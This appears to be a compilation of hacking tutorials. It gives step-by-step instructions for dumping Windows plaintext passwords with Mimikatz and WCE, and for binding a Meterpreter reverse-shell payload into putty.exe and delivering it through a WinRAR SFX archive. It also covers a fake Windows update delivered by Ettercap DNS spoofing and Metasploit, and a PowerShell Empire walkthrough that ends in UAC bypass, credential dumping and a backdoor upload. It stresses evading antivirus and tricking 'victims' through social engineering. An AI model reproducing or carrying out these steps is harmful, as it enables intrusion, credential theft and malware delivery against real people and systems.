Hack Windows Password in Clear Text using Mimikatz and Windows credential Editor

mimikatz is a tool to check Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

First Download mimikatz windows version from here. and right click on it & Run it as Administrator.

It will open mimikatz windows.

Type the following command to check  privilege

privilege::debug

Now type the following command to get users passwords in text mode.

sekurlsa::logonPasswords

Windows Credential Editor

Windows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and clear text passwords).

First Download WCE from here.

Go to WCE directory & execute the following command as Administrator. And run the following command

 wce.exe -w It will show the password in plaintext

Hack Remote PC using WinRAR SFX Remote Code Execution Vulnerability

Remote code execution vulnerability has been discovered in the official WInRAR SFX v5.21 software.The vulnerability allows remote attackers to unauthorized execute system specific code to compromise a target system.

The issue is located in the `Text and Icon` function of the `Text to display in SFX window` module. Remote attackers are able to generate own compressed archives with malicious payloads to execute system specific codes for compromise the attackers .

Download Shellter from here, shellter version is latest release, no antivirus has detected till now. After downloading shellter unzip the archive file

Set the location of shellter and type “wine shellter.exe

A terminal opens and choose operation mode as auto (a)

Now choose an executable file and copy to shellter folder to bind the shellter with any .exe file
here in my case I have copied putty.exe as a file to bind with shellter.exe

Note: only executable file can be binded

Now it asks for PE target after choosing operation method, give the filename .exe and binding process will start.

When prompted to enable stealth mode enter “Y”

When the binding is processed it will ask for the type of payload we want to use I have choose l for listed payload and then choose 1 for Meterpreter_reverse_tcp

Now give the lhost which is ip address of kali linux and lport as 4444

After giving all the options you will get a confirmation like Injection: verified! Press enter to continue.

Now you will get encrypted putty.exe file in shelter directory.

Move Putty.exe file to var/www/html directory.

Start apache services.

Now patch putty.exe path in winrar utility tool. Right click on winrar . Select add to Archive option.

Select Create SFX archive option. 

Select on Advanced and click on SFX options.

Now Select Text and Icon option and type the path of putty.exe file with iframe tag follows.

   Click on OK.

Now send this Winrar file to victim PC using any Social Engineering Technique.

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.5

exploit

Now send your putty.exe files to victim using any social engineering technique. Now when the victim will use putty you will get the meterpreter of victim PC.

Hack Remote PC using Fake Updates Scam with Ettercap and Metasploit

First of all, go to Kali Linux Home directory. Move to etc /ettercap directory.  Now edit etter.dns File.

Modify the contents of the etter.dns and add your own pc IP address as A record.

Now run the following command with victim pc IP address to spoof the victim pc.

ettercap  –i  eth0 –T  –q  –P  dns_spoof  -M  ARP  /192.168.0.103.//

It will activate dns_spoof plug-in.

Open terminal and type msfconsole to open metasploit

Now type use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.0.125 (IP of Local Host)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 2

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>exploit

Now copy this Powershell.exe code and save as update .bat file.

Now create a fake website page showing windows security update message. In webpage, give the hyperlink as update.bat file.

Now save this webpage as index.html and paste it in directory /var /www/html.

Now start   Apache    server .write following command. Service   Apache2   start.

When the victim will open any web, this page showing windows security update message will displayed.

When victim will click on download update link & save the batch file. The batch file will execute automatically.

Now you will get the control of victim PC. Now type the following command. Now type sessions –l to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.

Hacking with Empire - PowerShell Post-Exploitation Agent

Our today's article is the first post of our Empire series. In this, we will covering every basic you need to know about PowerShell Empire Framework. And with the eventually we study advance exploits of Empire.

Table of content:

·         Introduction

·         Installation

·         Importance

·         Terminology

·         Work Flow

·         Demo

·         Conclusion

Introduction

Empire is post-exploitation framework. It’s a pure PowerShell agent, focused solely through python with cryptographically-secure communications with add-on of a flexible architecture. Empire has the means to execute PowerShell agents without the requirement of PowerShell.exe. It can promptly employ post-exploitable modules, which covers a vast range from ranging from keyloggers to mimikatz, etc. This framework is a combination of PowerShell Empire and Python Empire projects; which makes it user friendly and convenient. PowerShell Empire came out in 2015 and Python Empire came out in 2016. It is similar to Metasploit and Meterpreter. But as it is command and control tool, it allows you to control a PC much more efficiently.

Importance

PowerShell provides abundant of offensive advantages which further includes the whole access of .NET, applock whitelisting, and straight access to Win32. It also constructs malicious binaries in memory. It provides C2 functionality and allows you implant second stage after the first one. It can also be used for lateral movement. And it comes handy as it develops rapidly in comparison to other frameworks. Also, as it does not requires PowerShell.exe, it lets you bypass anti-viruses. Hence, it is best to use PowerShell Empire.

Terminology

Before starting with the action you need to know these four things:

·         Listener: listener is a process which listens for a connection from the machine we are attacking. This helps Empire send the loot back to the attacker's computer.

·         Stager: A stager is a snippet of code that allows our malicious code to be run via the agent on the compromised host.

·         Agent: An agent is a program that maintains a connection between your computer and the compromised host.

·         Module: These are what execute our malicious commands, which can harvest credentials and escalate our privileges as mentioned above.

Installation

You can download Empire from here. Clone the command from the hyperlink provided for github or simply use google.

Use the following command to download it;

git clone https://github.com/EmpireProject/Empire.git

Once the downloaded is initiated and completed, follow steps given directly below in order to install it :

cd /Empire

ls

cd /setup

ls

./install.sh

Wait for it to complete installation. This might take a few seconds. It will prompt you for a password.

In my case, my password was toor.

Once the installation is done, move back a directory and run empire using ./empire.

Now use Help command as it opens up all the essential options required initially.

According to the work flow, firstly, we have to create a listener on our local machine. Type the following command:

listeners

After running the above command, it will say that “no listeners are currently active” but don’t worry, we are into the listener interface now.  So in this listener interface, type :

uselistener

The above command will list all the listeners that one can use, such as dbx, http, http_com, etc. The most popular and commonly used listener is http and we will use the same in our practical. For that type :

uselistener http

This command creates a listener on the local port 80. If port 80 is already busy by a service like apache, please make sure you stop that service as this listener being http listener will only work on port 80. Now to see all the settings that you ought to provide in this listener type :

info

As you can see in the image that there are variety of settings you can use to modify or customise your listener. Let’s try changing the name of our listener as it helps to remember all the listeners that are activated; if activated in bulk. So for this, type :

set Name test

The above command will change the listeners’ name from http to test.

Usually this listener automatically takes up the local host IP but, just in case, you can use the following command to set your IP :

set Host http://192.168.1.107

execute

Above command will execute the listener. Then go back and use powsershell listener as shown in the image.

Now type ‘back’ to go back from listener interface so that we can execute our modules. Use the following command to see all the modules that empire provides:

usestager

As you can see in the image below that there are a lot of modules for both windows and IOS along with some multi ones that can be used on any platforms. We will use launcher_bat to create the malware and exploit our victims’ PC in our practical. And for that type:

usestager windows/launcher_bat

Then again type ‘info’ in order to see all the settings required by the exploit. After examining you will see that we only need to provide listener. Therefore, type :

set Listener test

execute

The above two commands will execute our exploit after setting the listener test and create /tmp/launcher.bat. Use the python server to execute this file in victims’ PC. As the file will execute, you will have a session. To check your session type:

agents

With the above command you can see that you have a session activated. You can change the name of your session as name given by default is pretty complicated and difficult to remember. To do so type:

rename ZAF3GT5W raajpc

Use the following to access the session:

interact raajpc

Once you have gained access to the session, try and get admin session by using following command:

bypassuac http

After execute the bypassuac command another session will open. Rename that session too by typing :

rename HE3K45LN adminraj

Let’s interact with adminraj now.

interact adminraj

helps us view all the options in the shell. There are several options which is quite helpful to for post exploitation. Such as info, job, list and etc as shown in the image.

Info: for all the basic details like IP, nonce, jitter, integrity etc.

Now if you use ‘help’ command, you will be able to see all the executable commands. 

Let’s try and run mimikatz to get the password of the user. Since, mimikatz won’t run on a normal guest user shell and will only run on admin shell; this also proves that we have to achieve admin access so that we can use mimikatz.

Hmmmm!! And the password is “123”for user raj.

creds

Above command will dump the credentials or password of any user in both plaintext and its hash as well.

Another important command is the shell command.

To use the shell of the victim to run proper Microsoft windows commands, we use this feature.

Eg: one such window’s cmd only command is netstat

shell netstat -ano

And as expected, the above command showed us all the ports in work currently on the machine!

 Now, since the default shell directory in windows is “C:/windows/system32”; let’s try and move into another directory and try to download some file from there and also we can upload something at that location, for example we can upload a backdoor! Now, use the following commands for it :

shell cd C:\Users\raj\Desktop

shell dir

download 6.png

Above command will download an image called 6.png from the window’s desktop to the “downloads directory of Empire”

upload /root/Desktop/revshell.php

Here we can upload any backdoor, with help of above command we are uploading a php backdoor from Kali’s desktop to victim’s desktop and we can even invoke this file since we have the shell access!

This is where the downloaded files will go:

Empire directory/downloads//

shell dir

Above command proves that we indeed have uploaded revshell.php

And there it is! Revshell.php on the desktop of victim’s machine which our backdoor file.

Previously shown was the basic demo of empire and its different terms used and how to use them. There is another term too, i.e. usemodule. Lastly, let’s see how to use it.

usemodule

The command will show you all the modules available and ready to use as shown in image below:

Following is a small demo of how to use usermodule. Type :

usemodule trollsploit/message

set MsgText you have been hacked

execute

y

Using the above module will display a message on victims’ PC as shown image below :

Conclusion

Malwares in the form of .exe/dll/hta etc. allows an attacker to construct any desirable attack as this framework has access to Win32. Although, anti-virus companies are becoming aware day by day, these ones are still valid. It’s a great tool due to its vast, authentic and efficient collection of post-exploits. Ultimately, the goal is to be undetected and successful in your attack and this tool allows us to do so. And this articles covered all the basics you need to know for this framework.

Happy Hacking!!